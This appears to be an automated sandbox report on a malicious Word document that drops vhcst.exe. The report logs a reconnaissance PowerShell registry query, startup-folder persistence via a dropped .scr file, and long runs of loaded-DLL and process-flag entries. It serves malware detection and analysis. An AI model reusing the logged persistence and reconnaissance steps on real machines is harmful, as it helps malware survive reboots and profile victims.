                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32Jump to behavior
                  Source: 5QnwxSJVyX.LNK.0.drLNK file: ..\..\..\..\..\Desktop\5QnwxSJVyX.doc
                  Source: Templates.LNK.0.drLNK file: ..\..\Templates
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
                  Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
                  Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
                  Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
                  Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
                  Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
                  Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
                  Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
                  Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
                  Source: Element design set.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
                  Source: Element design set.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
                  Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
                  Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
                  Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
                  Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
                  Source: Equations.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
                  Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
                  Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
                  Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
                  Source: Equations.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
                  Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
                  Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
                  Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
                  Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/theme/_rels/theme1.xml.rels
                  Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
                  Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
                  Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
                  Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/_rels/settings.xml.rels
                  Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
                  Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
                  Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
                  Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
                  Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/item2.xml
                  Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
                  Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/itemProps3.xml
                  Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/item3.xml
                  Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
                  Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/_rels/item3.xml.rels
                  Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
                  Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = docProps/custom.xml
                  Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/media/image2.jpg
                  Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
                  Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
                  Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
                  Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
                  Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
                  Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
                  Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/media/image10.jpeg
                  Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
                  Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
                  Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
                  Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
                  Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
                  Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/document.xml
                  Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
                  Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
                  Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
                  Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
                  Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                  Source: Element design set.dotx.0.drInitial sample: OLE indicators vbamacros = False

                  Data Obfuscation

                  barindex
                  Suspicious powershell command line found
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
                  Source: vhcst.exe.0.drStatic PE information: 0xF5959D04 [Sun Jul 25 18:23:00 2100 UTC]
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99E47EA0 push eax; retn 99F5h6_2_00007FFD99E482B9
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99E2C8FB push ebx; retf 0001h6_2_00007FFD99E2C93A
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99E2C758 push ebx; retf 0001h6_2_00007FFD99E2C93A
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FE5905 push cs; retf 6_2_00007FFD99FE597F
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD99D0D2A5 pushad ; iretd 7_2_00007FFD99D0D2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD99EF2316 push 8B485F93h; iretd 7_2_00007FFD99EF231B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFD99E223AA pushad ; retf 25_2_00007FFD99E223D1

                  Persistence and Installation Behavior

                  barindex
                  Drops PE files with a suspicious file extension
                  Source: C:\7037005\vhcst.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SYTv5.scrJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\2716439\vhcst.exeJump to dropped file
                  Source: C:\7037005\vhcst.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SYTv5.scrJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\7037005\vhcst.exeJump to dropped file
                  Source: C:\7037005\vhcst.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SYTv5.scrJump to dropped file

                  Boot Survival

                  barindex
                  Drops PE files to the startup folder
                  Source: C:\7037005\vhcst.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SYTv5.scrJump to dropped file
                  Source: C:\7037005\vhcst.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SYTv5.scrJump to behavior
                  Source: C:\7037005\vhcst.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SYTv5.scrJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\7037005\vhcst.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\7037005\vhcst.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
